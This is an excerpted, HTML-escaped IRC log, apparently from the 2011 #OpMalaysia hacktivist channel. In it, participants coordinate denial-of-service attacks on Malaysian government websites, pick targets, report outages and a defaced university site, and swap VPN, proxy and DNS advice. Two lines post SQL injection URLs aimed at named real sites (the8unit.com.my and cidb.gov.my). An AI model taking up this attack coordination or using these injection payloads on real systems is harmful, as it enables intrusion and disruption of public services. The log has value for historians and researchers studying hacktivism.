11http://uleak.it/?3kq  '&lt;br /&gt; 03[20:08] * Set by Anon_Tim on Wed Jun 15 10:54:50&lt;br /&gt;[20:08] &lt;kru&gt; i want to exploit it now&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[21:00] &lt;mib_jyfiq2&gt; ptptn website would be best...haha&lt;br /&gt;[21:00] &amp;lt;@morrissey&amp;gt; lol. who doesnt wish to get a 4flat? :P&lt;br /&gt;[21:00] &lt;sx2&gt; i mean with daylight saving in, say the UK, it's 2pm now here but its 9pm in KL&lt;br /&gt;[21:00] &lt;antinode&gt; haha&lt;br /&gt;[21:01] &amp;lt;@OnlyWork&amp;gt; al wanted ptptn&lt;br /&gt; 10[21:01] * Joins: WebAnon49361 (WebAnon49361@AN-4k9.7di.6jjkdg.IP)&lt;br /&gt;[21:01] &lt;f4s7&gt; so 4.30 it is&lt;br /&gt;[21:01] &lt;xops&gt; i wish had 4 flat in computer science :D&lt;br /&gt;[21:01] &lt;mrcuteo&gt; aiya dont attack ptptn nanti student susah woh :)&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[21:01] &lt;coldblood&gt; we can hack ptptn and burn the records, how is it sound?&lt;br /&gt;[21:01] &amp;lt;@OnlyWork&amp;gt; and anono wont target financial side&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[21:34] &lt;againandagain&gt; hack ptptn please lmao&lt;br /&gt;[21:34] &lt;susu&gt; hahaha&lt;br /&gt; 10[21:35] * Joins: Narakkk (Mibbit@AN-1hj.nid.7ssl5k.IP)&lt;br /&gt;[21:35] &lt;waklu&gt; dont hack ptptn pls&lt;br /&gt; 10[21:35] * Joins: noname (noname@AN-acb.532.7ssl5k.IP)&lt;br /&gt;[21:35] &lt;waklu&gt; i got 70k loan&lt;br /&gt;[21:35] &lt;rylai&gt; it's a final countdown&lt;br /&gt; 10[21:35] * Joins: Aizad (textual@AN-vp2.5rh.5s204u.IP)&lt;br /&gt;[21:35] &lt;waklu&gt; later increase become 1000k&lt;br /&gt;[21:35] &lt;susu&gt; LOL&lt;br /&gt;[21:35] &lt;mrcuteo&gt; LOL~&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[23:30] &lt;vv6&gt; ========    attention the attack has begin!      =========&lt;br /&gt;[23:31] &lt;vv6&gt; ========    attention the attack has begin!      =========&lt;br /&gt;[23:31] &lt;vv6&gt; ========    attention the attack has begin!      =========&lt;br /&gt;[23:31] &lt;vv6&gt; ========    attention the attack has begin!      =========&lt;br /&gt; 10[23:31] * Joins: kreuger (Kreuger@AN-0k0.gaa.jsqf2k.IP)&lt;br /&gt;[23:31] &lt;vv6&gt; ========    attention the attack has begin!      =========&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[23:35] &lt;admin&gt; cant connect to www.malaysia.gov.my&lt;br /&gt;[23:35] &lt;mib_zhwqhv&gt; Malaysian police vows want to arrest anon members...rofl&lt;br /&gt;[23:35] &lt;f4s7&gt; u kill him&lt;br /&gt;[23:35] &lt;sht&gt; Yeah same&lt;br /&gt;[23:35] &lt;f4s7&gt; hahahha&lt;br /&gt;[23:35] &lt;admin&gt; they're scared already...&lt;br /&gt;[23:36] &lt;sn0rtdogg&gt; La primera ola pequeño ataque ha comenzado. Misión # 1: Stormrider&lt;br /&gt;[23:36] &lt;vv6&gt; admin&lt;br /&gt;[23:36] &lt;vv6&gt; who scared?&lt;br /&gt; 10[23:36] * Joins: Anon97 (Sfrontierz@AN-9l5.u50.s7l9t5.IP)&lt;br /&gt; 02[23:36] * Quits: Anon97 (Sfrontierz@AN-9l5.u50.s7l9t5.IP ) (Quit:  )&lt;br /&gt;[23:36] &lt;mib_sleepy&gt; noted. cant access malaysia.gov.my&lt;br /&gt;[23:36] &lt;vv6&gt; u mean police member?&lt;br /&gt; 10[23:36] * Joins: Anon97 (Sfrontierz@AN-9l5.u50.s7l9t5.IP)&lt;br /&gt;[23:36] &lt;vv6&gt; cuz&lt;br /&gt;[23:36] &lt;vv6&gt; got ddos&lt;br /&gt;[23:36] &lt;hitbsecphotos&gt; Vv6: police lah&lt;br /&gt;[23:36] &lt;payik&gt; [23:36] * Dns resolving malaysia.gov.my&lt;br /&gt;[23:36] &lt;payik&gt; -&lt;br /&gt;[23:36] &lt;payik&gt; [23:36] * Dns unable to resolve malaysia.gov.my&lt;br /&gt;[23:36] &lt;payik&gt; -&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[00:43] &lt;meraki&gt; What's the current target btw&lt;br /&gt;[00:43] &lt;annoycyber&gt; !topic&lt;br /&gt; 08[00:43] -Chuck:#OpMalaysia- Channel Topic:  10Target:  7When OP takes place  10| Status:  4Up  10| Press Release:  14http://uleak.it/?3kn  10| When:  6June 15, 2011 7:30PM GMT  10| Flyer:  7http://uleak.it/?3kp  10| New to IRC or Hacking? Join  5#OpNewBlood or #Tutorials  10|Video:  11http://uleak.it/?3j7  10| VPN Guide:  11http://uleak.it/?3kq &lt;br /&gt;[00:43] &lt;taeyeon&gt; yeah&lt;br /&gt;[00:43] &lt;bersih&gt; ok this is funny https://www.facebook.com/mydragonforce/posts/231170146909664&lt;br /&gt;[00:43] &amp;lt;~Effexor&amp;gt; Title: Di hack untuk kali... | Facebook (at www.facebook.com)&lt;br /&gt;[00:43] &lt;taeyeon&gt; the new site&lt;br /&gt;[00:43] &lt;supportopmalaysia&gt; malaysia edition of piratebay&lt;br /&gt;[00:43] &lt;bishop&gt; I am drunk, i sufffer from PMS, so be cautios&lt;br /&gt;[00:43] &lt;supportopmalaysia&gt; still on beta testing&lt;br /&gt; 02[00:43] * Quits: SledgeAcidBurn (eddie@AN-u28.rmd.4tc11b.IP ) (Ping timeout: 121 seconds )&lt;br /&gt;[00:43] &lt;wabbit&gt; lol&lt;br /&gt;[00:43] &lt;llquor&gt; ok thanks for the info&lt;br /&gt;[00:43] &lt;bishop&gt; and I am lstening ti Ministry&lt;br /&gt; 10[00:43] * Joins: mib_ufhywg (Mibbit@AN-h94.76m.p5m5r0.IP)&lt;br /&gt;[00:44] &lt;sht_tha_fck_up&gt; Hey, is http://www.your-freedom.net/ Safe? What do you think?&lt;br /&gt;[00:44] &lt;wabbit&gt; your bleeding bishop&lt;br /&gt;[00:44] &lt;hunter&gt; wow malaysiabay its good :D&lt;br /&gt;[00:44] &amp;lt;~Effexor&amp;gt; Title: Your Freedom - Bypass firewalls and proxies, stay anonymous (at www.your-freedom.net)&lt;br /&gt;[00:44] &lt;bishop&gt; i am bleeding&lt;br /&gt;[00:44] &lt;extrablack&gt; 1malaysia.gov.my is down??&lt;br /&gt;[00:44] &lt;morrissey&gt; lol bishop&lt;br /&gt;[00:44] &lt;mech&gt; http://www.samair.ru/proxy/socks.htm&lt;br /&gt;[00:44] &amp;lt;~Effexor&amp;gt; Title: SOCKS servers lists (at www.samair.ru)&lt;br /&gt;[00:44] &lt;al-pacino&gt; http://www.the8unit.com.my/news.php?id=%275 injeq~&lt;br /&gt;[00:44] &lt;pudgetta&gt; !hive&lt;br /&gt;[00:44] &amp;lt;~Effexor&amp;gt; Title: The 8 Unit (at www.the8unit.com.my)&lt;br /&gt; 04[00:44] * joepie91 sets mode: -b *!*moar@staff.anonops.li&lt;br /&gt;[00:44] &lt;extrablack&gt; 1malaysia.gov.my is down??&lt;br /&gt;[00:44] &lt;joepie91&gt; Sht_Tha_Fck_Up: do NOT use free VPNs&lt;br /&gt; 04[00:44] * Chuck sets mode: +b *!*moar@staff.anonops.li&lt;br /&gt; 04[00:44] * joepie91 was kicked by Chuck (Turn caps lock OFF! )&lt;br /&gt; 10[00:44] * Joins: joepie91 (moar@staff.anonops.li)&lt;br /&gt;[00:44] &lt;kamate&gt; http://www.downforeveryoneorjustme.com/malaysia.gov.my&lt;br /&gt;[00:44] &lt;malaysiancitizenlol&gt; !hive&lt;br /&gt;[00:44] &amp;lt;~Effexor&amp;gt; Title: http://malaysia.gov.my Is Down -&amp;gt; Check if your website is up or down? (at www.downforeveryoneorjustme.com)&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[00:59] &lt;jin_manusia&gt; http://penang.uitm.edu.my/   &amp;lt;----- hackeddddddd&lt;br /&gt;[00:59] &lt;effexor&gt; Title: H4ck3D By H3x4CreW RileksCreW 3viLc0d3s (at penang.uitm.edu.my)&lt;br /&gt;[00:59] &lt;effexor&gt; Title: H4ck3D By H3x4CreW RileksCreW 3viLc0d3s (at penang.uitm.edu.my)&lt;br /&gt;[00:59] &lt;taeyeon&gt; please dont ddos through proxy, you will dos the proxies not the site&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[02:11] &lt;outlawz&gt; stop using caps&lt;br /&gt; 03[02:12] * ` is now known as D-Mist&lt;br /&gt;[02:12] &lt;hitbsecphotos&gt; xUmaRix: wak lu&lt;br /&gt;[02:12] &lt;bedanc&gt; http://www.cidb.gov.my/v6/?q=en/content/150%27%20OR%201;%20--&lt;br /&gt;[02:12] &lt;mech&gt; what is wak lu?&lt;br /&gt;[02:12] &lt;bedanc&gt; LULZ&lt;br /&gt;[02:12] &lt;f4s7&gt; DNS&lt;br /&gt;[02:12] &lt;d&gt; can some1 ban the hibsec guy?&lt;br /&gt;[02:12] &lt;d3ck4&gt; hi xUmaRix&lt;br /&gt;[02:12] &lt;bedanc&gt; SQL Injection :S http://www.cidb.gov.my/v6/?q=en/content/150%27%20OR%201;%20--&lt;br /&gt;[02:12] &lt;outlawz&gt; DNS ftw&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt; 00[02:36] * bishop changes topic to 'IDEAS: http://piratenpad.de/hecz4sSj74 | Status: Up | Press Release: http://uleak.it/?3kn | When: June 15, 2011 7:30PM GMT | Flyer: http://uleak.it/?3kp | New to IRC or Hacking? Join #OpNewBlood or #Tutorials |Video: http://uleak.it/?3j7 | VPN Guide: http://uleak.it/?3kq | English Only Please '&lt;br /&gt; 02[02:36] * Quits: kc (Mibbit@AN-v8g.uq1.chhu9g.IP ) (Quit: http://www.mibbit.com ajax IRC Client )&lt;br /&gt;[02:36] &lt;anon_tim&gt; What are your targets supposed to be?&lt;br /&gt;[02:36] &lt;imseeker32&gt; coordinate it!&lt;br /&gt; 10[02:36] * Joins: opsony717 (opsony717@AN-qnc.qvr.fa4d8v.IP)&lt;br /&gt;[02:36] &lt;it_bandit&gt; how about malaysia cop website&lt;br /&gt;[02:37] &lt;it_bandit&gt; www.rmp.gov.my&lt;br /&gt;[02:37] &lt;xumarix&gt; .gov.my&lt;br /&gt; 09[02:37] * WebAnon1921 slaps WebAnon1921 around a bit with a large fishbot&lt;br /&gt;[02:37] &lt;xumarix&gt; www.mod.gov.my running IIS 7.0&lt;br /&gt; 03[02:37] * open-G0NE is now known as opensourcerer&lt;br /&gt;[02:37] &lt;imseeker32&gt; we take down 1 by one.&lt;br /&gt;[02:37] &lt;operationlol_&gt; YAH Take down the malaysian cop website!!!&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; PROBLEM: Malaysia blocks filesharing sites.&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; GOAL: * Help Malaysians get around filters&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;            * Create media attention for the cause&lt;br /&gt; 10[02:42] * Joins: ab_nh (Mibbit@AN-9jl.cjh.p5m5r0.IP)&lt;br /&gt; 02[02:42] * Quits: kambing (EpicAnon@AN-s7d.7s9.ndc0v8.IP ) (Quit:  )&lt;br /&gt; 02[02:42] * Quits: se7en (se7en@AN-453.41i.qadka5.IP ) (Ping timeout: 121 seconds )&lt;br /&gt; 02[02:42] * Quits: Sh1nky (Mibbit@AN-4pa.vpg.cpfies.IP ) (Quit: http://www.mibbit.com ajax IRC Client )&lt;br /&gt;[02:42] &lt;mib_ajrsao&gt; http://www.blm33.net/opmy.php&lt;br /&gt;[02:42] &lt;imseeker32&gt; Umarix, you coordinate this attack.&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; POSSIBLE SOLUTIONS&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; =====================&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; 1. Unpublicized TOR nodes (these cannot be blocked because they are not publicly known, you can only use them when you have the IP)&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;     Howto: (insert link to howto here)&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;     &lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; 2. Set up mirrors of filesharing sites&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;     -&amp;gt; Use something like httrack/wget to set up a mirror of thepiratebay etc on some spare server space? Suggestions welcome&lt;br /&gt; 10[02:42] * Joins: Anonnite (Mibbit@AN-1dl.1bq.75uftt.IP)&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;     &lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt; 3. Set up alternatives &lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;     Basically, set up your own filesharing sites. Make them as accessible as possible&lt;br /&gt;[02:42] &amp;lt;@w33dy&amp;gt;     Multiple domains, multiple IPs, etc.&lt;br /&gt;[02:42] &lt;korapted&gt; changing DNS?&lt;br /&gt; 10[02:42] * Joins: drusoft (drusoft@AN-fan.vsa.mpq0id.IP)&lt;br /&gt;[02:42] &lt;ping19999&gt; http://www.rmp.gov.my/ Server Error&lt;br /&gt;[02:42] &amp;lt;@bishop&amp;gt; w33dy: put it on tha PAD&lt;br /&gt;[02:42] &lt;ping19999&gt; The server encountered an internal error and was unable to complete your request.&lt;br /&gt;[02:43] &amp;lt;%Effexor&amp;gt; Title: Laman Web Rasmi Polis Diraja Malaysia (at www.rmp.gov.my)&lt;br /&gt;[02:43] &lt;morrissey&gt; +m?&lt;br /&gt;[02:43] &lt;korapted&gt; using VPN and proxy servers.&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[02:56] &lt;nemoegg&gt; do not try edu . that's not cool&lt;br /&gt;[02:56] &amp;lt;@esc&amp;gt; legion: Has nothing to do with this op. :)&lt;br /&gt; 04[02:56] * weezas was kicked by bishop (terminated )&lt;br /&gt; 04[02:56] * legion was kicked by shift (wrong chan kiddo )&lt;br /&gt; 02[02:56] * Quits: intan (asdasds@AN-coc.jri.nkkgq7.IP ) (Ping timeout: 121 seconds )&lt;br /&gt;[02:56] &amp;lt;&amp;amp;shift&amp;gt; o/&lt;br /&gt;[02:56] &lt;haizzzz&gt; no edu right ?&lt;br /&gt; 02[02:56] * Quits: WebAnon24787 (WebAnon24787@AN-p53.t55.1gsc09.IP ) (Ping timeout: 121 seconds )&lt;br /&gt; 10[02:56] * Joins: D-Mist (gdsa@AN-u0e.fje.jsqf2k.IP)&lt;br /&gt;[02:56] &lt;anon_tim&gt; Attacking malaysia.gov.my won't work&lt;br /&gt; 10[02:56] * Joins: weezas (weezas@AN-vmd.1me.r07okb.IP)&lt;br /&gt; 10[02:56] * Joins: Alice (Mibbit@AN-k1v.3uq.krpp7c.IP)&lt;br /&gt;[02:56] &lt;wabbit&gt; yea haizz&lt;br /&gt;[02:56] &lt;fisau&gt; http://www.skmm.gov.my/ &lt;br /&gt;[02:56] &lt;fisau&gt; hehe&lt;br /&gt;[02:56] &amp;lt;@bishop&amp;gt; NO .edu, NO media&lt;br /&gt;[02:56] &lt;weezas&gt; siorry&lt;br /&gt;[02:56] &amp;lt;%Effexor&amp;gt; Title: MCMC | SKMM (at www.skmm.gov.my)&lt;br /&gt;[02:56] &amp;lt;@bishop&amp;gt; NO .edu, NO media&lt;br /&gt;[02:56] &lt;novalis&gt; Anon_Tim: y not?&lt;br /&gt;[02:56] &lt;xumarix&gt; attacking .gov.my nameserver ?&lt;br /&gt;[02:56] &amp;lt;@bishop&amp;gt; NO .edu, NO media&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[03:04] &amp;lt;&amp;amp;Cake&amp;gt; READ IT&lt;br /&gt;[03:04] &lt;c0smic&gt; :(&lt;br /&gt;[03:04] &lt;annoycyber&gt; VPN ppl, VPN!&lt;br /&gt;[03:04] &amp;lt;~Nessuno&amp;gt; DISCUSS TARGETS&lt;br /&gt;[03:04] &amp;lt;&amp;amp;Cake&amp;gt; stick to topic&lt;br /&gt; 10[03:04] * Joins: mib_zo1ks8 (Mibbit@AN-0vm.b5v.skvune.IP)&lt;br /&gt;[03:04] &lt;govt&gt; aim: freedom of speech..stay focus&lt;br /&gt;[03:04] &amp;lt;@bishop&amp;gt; targets go here: http://piratenpad.de/hecz4sSj74&lt;br /&gt;[03:04] &amp;lt;%Effexor&amp;gt; Title: PiratenPad: hecz4sSj74 (at piratenpad.de)&lt;br /&gt;[03:04] &lt;annoycyber&gt; Else, we'll see Msians going to jail tomorrow&lt;br /&gt;[03:04] &lt;anon_tim&gt; I thought this wasn't a LOIC operation&lt;br /&gt;[03:04] &lt;hack1&gt; PENERANGAN.GOV.MY still up&lt;br /&gt; [03:04] &amp;lt;+joepie91&amp;gt; nessuno&lt;br /&gt;[03:04] &amp;lt;+joepie91&amp;gt; pm&lt;br /&gt;[03:04] &amp;lt;+wabbit&amp;gt; there should be plenty lmao&lt;br /&gt;[03:04] &lt;hack1&gt; PENERANGAN.GOV.MY still up&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt; 04[03:06] * Nessuno sets mode: +m&lt;br /&gt;[03:06] &amp;lt;%Effexor&amp;gt; Title: Toll Equipment Monitoring System - TEMS (at 211.25.171.89)&lt;br /&gt;[03:06] &amp;lt;%Effexor&amp;gt; Title: CyberSecurity Malaysia (at www.cybersecurity.my)&lt;br /&gt; 10[03:06] * Joins: mr_hollow (Mibbit@AN-91l.ksd.ga0n5v.IP)&lt;br /&gt;[03:06] &amp;lt;&amp;amp;Cake&amp;gt; tgkje, you attacking by yourself? GL kid&lt;br /&gt; 02[03:06] * Quits: mib_s9msk8 (Mibbit@AN-8de.vsa.mpq0id.IP ) (Quit: http://www.mibbit.com ajax IRC Client )&lt;br /&gt; 10[03:06] * Joins: Dark_Night (FuckYeah@Opitaly.it)&lt;br /&gt;[03:06] &amp;lt;~Nessuno&amp;gt; WE NEED TO DISCUSS A CLEAR PLAN OF ACTION.  WE ARE NOT JUST ALL ABOUT DDOS&lt;br /&gt;[03:06] &amp;lt;~Nessuno&amp;gt; WE NEED TO DISCUSS A CLEAR PLAN OF ACTION.  WE ARE NOT JUST ALL ABOUT DDOS&lt;br /&gt;[03:06] &amp;lt;~Nessuno&amp;gt; WE NEED TO DISCUSS A CLEAR PLAN OF ACTION.  WE ARE NOT JUST ALL ABOUT DDOS&lt;br /&gt; 04[03:06] * Nessuno sets mode: -m&lt;br /&gt;[03:06] &lt;dark_night&gt; :o&lt;br /&gt;[03:06] &amp;lt;~Nessuno&amp;gt; got it?&lt;br /&gt;[03:06] &amp;lt;+wabbit&amp;gt; yea&lt;br /&gt;[03:06] &lt;dark_night&gt; spam it? :D&lt;br /&gt;[03:06] &lt;annoycyber&gt; Roger that&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[03:09] &amp;lt;+joepie91&amp;gt; ok&lt;br /&gt;[03:09] &amp;lt;+joepie91&amp;gt; guys&lt;br /&gt;[03:09] &amp;lt;+joepie91&amp;gt; listen up&lt;br /&gt;[03:09] &amp;lt;+joepie91&amp;gt; we need your help to think of methods&lt;br /&gt;[03:09] &amp;lt;+joepie91&amp;gt; to make this operation work&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; and LOIC is NOT an option&lt;br /&gt; 10[03:10] * Joins: brn (thc@AN-nmt.k7o.gccsid.IP)&lt;br /&gt; 10[03:10] * Joins: Pepper-D (Mibbit@AN-282.c78.832d04.IP)&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; you can discuss here: http://piratenpad.de/hecz4sSj74 but please leave the pad when you are not working on it&lt;br /&gt;[03:10] &amp;lt;@bishop&amp;gt; guys, cool down: http://30.media.tumblr.com/tumblr_lle2cfkzTF1qa8vdgo1_400.png&lt;br /&gt;[03:10] &amp;lt;%Effexor&amp;gt; Title: PiratenPad: hecz4sSj74 (at piratenpad.de)&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; because there is a user limit&lt;br /&gt; 10[03:10] * Joins: w3eedy (w33dy@AN-re0.3iv.o5kn42.IP)&lt;br /&gt; 10[03:10] * Joins: omny (no@AN-3v4.a8g.s7l9t5.IP)&lt;br /&gt; 02[03:10] * Quits: brn (thc@AN-nmt.k7o.gccsid.IP ) (Quit:  1Full Throttle: made in Brazil  )&lt;br /&gt; 02[03:10] * Quits: JamesDoe (James@Chasing.your.tail ) (Quit: Leaving )&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; so, basically&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; do your best on finding ways to make this op a sucess&lt;br /&gt; 02[03:10] * Quits: ImSeeker32 (WebAnon19930@AN-btg.0oo.pafme2.IP ) (Ping timeout: 121 seconds )&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; ways that do not involve loic&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; or ddos&lt;br /&gt;[03:10] &amp;lt;+joepie91&amp;gt; or hacking sites&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[03:13] &amp;lt;@OperationLol&amp;gt; I don't know what people meant  by Non LOIC mission.&lt;br /&gt;[03:13] &amp;lt;@OperationLol&amp;gt; ?&lt;br /&gt;[03:13] &amp;lt;@OperationLol&amp;gt; Like really.&lt;br /&gt;[03:13] &amp;lt;@OperationLol&amp;gt; :P&lt;br /&gt;[03:13] &lt;annoycyber&gt; I completely agree with you OperationLol&lt;br /&gt;[03:13] &lt;mr_hollow&gt; help  me plss y i cant open loic??&lt;br /&gt;[03:13] &lt;d-mist&gt; bypass blocked using hotspot shield. protect your i.p first. thanks.&lt;br /&gt;[03:13] &lt;annoycyber&gt; If they want to discuss about it, they can just go to the forums, or facebook&lt;br /&gt;[03:13] &amp;lt;@OperationLol&amp;gt; Yes,&lt;br /&gt; 10[03:13] * Joins: opmalaysia881 (opmalaysia881@AN-1cu.9hb.nkkgq7.IP)&lt;br /&gt; 02[03:14] * Quits: xUmaRix (rosmah@jolok.najibrazak.arse.mu ) (Ping timeout: 121 seconds )&lt;br /&gt;[03:14] &amp;lt;~Nessuno&amp;gt; OperationLol LOIC will acheive fuck all&lt;br /&gt;[03:14] &amp;lt;@OperationLol&amp;gt; Now heres the place were action takes place.&lt;br /&gt;[03:14] &amp;lt;@OperationLol&amp;gt; Tell em to get a VPN&lt;br /&gt;[03:14] &amp;lt;%Anon_Tim&amp;gt; Operation&lt;br /&gt;[03:14] &lt;vex&gt; http://www.1malaysia.com.my/test.php&lt;br /&gt;[03:14] &lt;arthas_1203&gt; how to get VPN?&lt;br /&gt;[03:14] &amp;lt;%Effexor&amp;gt; Title: Untitled Document (at www.1malaysia.com.my)&lt;br /&gt;[03:14] &amp;lt;@esc&amp;gt; Loic will achieve nothing. You can down their sites and thats all. Afterwards you'll still have the same problems.&lt;br /&gt;[03:14] &lt;ded1&gt;  :)&lt;br /&gt;[03:14] &amp;lt;%Anon_Tim&amp;gt; This was meant to be a LOIC operation&lt;br /&gt;[03:14] &amp;lt;%Anon_Tim&amp;gt; Attacking certain IPs&lt;br /&gt;[03:14] &lt;annoycyber&gt; That's what hacktivism is about&lt;br /&gt;[03:14] &lt;jarkoo&gt; lol ded1&lt;br /&gt;[03:14] &lt;anonysocool&gt; they start already?&lt;br /&gt;[03:14] &lt;root_&gt; kecoh siy0t&lt;br /&gt;[03:14] &lt;afiq27&gt; what problem esc?&lt;br /&gt;[03:14] &lt;morrissey&gt; hah hacktivists&lt;br /&gt;[03:15] &amp;lt;%Anon_Tim&amp;gt; We were going to release the IPs one by one&lt;br /&gt; 02[03:15] * Quits: wtvengeance (wtvengeance@what.the.vengeance ) (Connection closed )&lt;br /&gt; 02[03:15] * Quits: lilybet (Mibbit@AN-pjo.df0.ikj289.IP ) (Quit: http://www.mibbit.com ajax IRC Client )&lt;br /&gt;[03:15] &amp;lt;%Anon_Tim&amp;gt; All of us attacking it at the same time 'till they're all down&lt;br /&gt;[03:15] &amp;lt;+joepie91&amp;gt; LOIC will do absolutely fucking NOTHING&lt;br /&gt;[03:15] &amp;lt;%Anon_Tim&amp;gt; We attack them, the whole server's down&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[03:19] &amp;lt;@OperationLol&amp;gt; Sure pal&lt;br /&gt;* Joins: elChe (elChe@FreedomOrNothing.nsa.gov) &amp;lt;--- Nice try&lt;br /&gt;[03:19] &amp;lt;@esc&amp;gt; USA based VPNs are required to log by law.&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[04:17] &amp;lt;&amp;amp;esc&amp;gt; press requests/interviews should be handled in #reporter&lt;br /&gt;[04:17] &amp;lt;@joepie91&amp;gt; oh, it redirects you there?&lt;br /&gt;[04:17] &lt;fenris&gt; So I woke up for nothing?&lt;br /&gt;[04:17] &lt;ebb&gt; getting mariried to godop..fyi, ded1&lt;br /&gt;[04:17] &amp;lt;&amp;amp;esc&amp;gt; press requests/interviews should be handled in #reporter&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[04:24] &lt;coffee&gt; plan! plan!&lt;br /&gt;[04:24] &lt;gr4c1&gt; some day, I believe malaysian will only allow to browse malaysian website. no more international web.&lt;br /&gt;[04:24] &lt;tm_press&gt; I am done&lt;br /&gt; 02[04:24] * Quits: opc_69 (opc_69@AN-3g7.ski.9tq214.IP ) (Ping timeout: 121 seconds )&lt;br /&gt;[04:24] &amp;lt;@joepie91&amp;gt; tm_press: stop the anti-propaganda, srsly&lt;br /&gt; 03[04:24] * leman is now known as putra&lt;br /&gt;[04:24] &lt;emkem&gt; komkom: najib has a twitter, go there and whining to him..&lt;br /&gt;[04:24] &lt;agobot&gt; .&lt;br /&gt;[04:24] &lt;edrick&gt; prabu^: lol&lt;br /&gt; 10[04:24] * Joins: mib_hbsp2t (Mibbit@AN-bd4.egt.5s204u.IP)&lt;br /&gt;[04:24] &lt;vv0rm6an0n&gt; yeah&lt;br /&gt;[04:24] &amp;lt;@joepie91&amp;gt; I know how it is there&lt;br /&gt;[04:24] &lt;vv0rm6an0n&gt; stop it&lt;br /&gt;[04:24] &amp;lt;@joepie91&amp;gt; cut the bullshit&lt;br /&gt;[04:24] &lt;cornelius&gt; i dont care bout the 1.8m. the damage is done. &lt;br /&gt; 03[04:24] * agobot is now known as b0xn3t&lt;br /&gt;[04:24] &lt;vv0rm6an0n&gt; better fuck the server right now&lt;br /&gt; 03[04:24] * LunarEclipse is now known as Bijan&lt;br /&gt;[04:24] &lt;vv0rm6an0n&gt; less talk &lt;br /&gt;[04:24] &lt;bijan&gt; here I come&lt;br /&gt;[04:24] &amp;lt;@bishop&amp;gt; http://theos.in/windows-xp/free-fast-public-dns-server-list/  FREE DNS SERVERS&lt;br /&gt;[04:24] &lt;w33dy&gt; Damage? :O&lt;br /&gt;[04:24] &amp;lt;%Effexor&amp;gt; Title: Free Fast Public DNS Servers List (at theos.in)&lt;br /&gt;[04:24] &amp;lt;@bishop&amp;gt; http://theos.in/windows-xp/free-fast-public-dns-server-list/  FREE DNS SERVERS&lt;br /&gt;[04:24] &lt;komkom&gt; u think najib will read it ?&lt;br /&gt;[04:24] &lt;alice&gt; fine, i'm changing my name&lt;br /&gt;[04:24] &lt;gr4c1&gt; done, registered nick. &lt;br /&gt; 10[04:25] * Parts: mizy (jason.bourne@AN-689.3sh.ipasrr.IP)&lt;br /&gt; 10[04:25] * Joins: mizy (jason.bourne@AN-689.3sh.ipasrr.IP)&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; bishop: was about to post that lol&lt;br /&gt;[04:25] &lt;komkom&gt; he only hire other people to read&lt;br /&gt;[04:25] &lt;cornelius&gt; damage : 1.8m spent&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; =&amp;gt; Service provider: Google&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; Google public dns server IP address:&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 8.8.8.8&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 8.8.4.4&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; =&amp;gt; Service provider:Dnsadvantage&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; Dnsadvantage free dns server list:&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 156.154.70.1&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 156.154.71.1&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; =&amp;gt; Service provider:OpenDNS&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; OpenDNS free dns server list / IP address:&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 208.67.222.222&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 208.67.220.220&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; =&amp;gt; Service provider:Norton&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; Norton free dns server list / IP address:&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 198.153.192.1&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 198.153.194.1&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; =&amp;gt; Service provider: GTEI DNS (now Verizon)&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; Public Name server IP address:&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 4.2.2.1&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 4.2.2.2&lt;br 